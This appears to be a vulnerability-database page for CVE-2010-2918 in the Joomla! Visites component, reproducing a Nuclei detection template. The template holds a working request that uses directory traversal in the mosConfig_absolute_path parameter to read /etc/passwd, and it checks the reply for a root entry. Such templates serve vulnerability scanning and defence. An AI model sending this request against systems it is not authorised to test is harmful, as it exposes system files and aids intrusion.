Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-2918
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
47
joomla
component
remote file inclusion
visocrea
cve2010
exploit-db

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.5

Confidence

High

EPSS

0.028

Percentile

90.8%

A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.

id: CVE-2010-2918

info:
  name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
  author: daffainfo
  severity: high
  description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
  impact: |
    Remote file inclusion vulnerability in Joomla! Component Visites 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/31708
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2918
    - https://www.exploit-db.com/exploits/14476
    - http://www.vupen.com/english/advisories/2010/1925
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/42025
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2918
    cwe-id: CWE-94
    epss-score: 0.02847
    epss-percentile: 0.90703
    cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: visocrea
    product: com_joomla_visites
  tags: cve,cve2010,joomla,lfi,edb,visocrea

http:
  - method: GET
    path:
      - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200c91419c3b0dbe4afe3e27b165914d136e3f1855987e5f3f1ddeffe3a0eb6669022100d24948753205fe02e60749f58a0130d1567ccb88505cedee18f474e98e61c8bd:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.5

Confidence

High

EPSS

0.028

Percentile

90.8%

Related for NUCLEI:CVE-2010-2918